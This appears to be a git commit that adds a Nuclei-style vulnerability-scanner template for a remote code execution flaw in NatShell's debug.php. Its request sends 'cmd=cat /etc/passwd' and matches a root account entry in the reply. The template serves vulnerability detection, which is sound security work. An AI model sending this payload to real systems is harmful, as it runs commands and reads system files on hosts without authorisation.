Create natshell-rce.yaml

patch-1
PikPikcU 2021-05-27 14:59:33 +00:00 committed by GitHub
parent c9e2a3c535
commit f1726d3a1f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: natshell-rcce
info:
name: NatShell Rce
author: pikpikcu
severity: high
reference: |
- https://twitter.com/sec715/status/1397924997457317897
tags: natshell,rce
requests:
- method: GET
path:
- "{{BaseURL}}/debug.php"
body: |
cmd=cat /etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200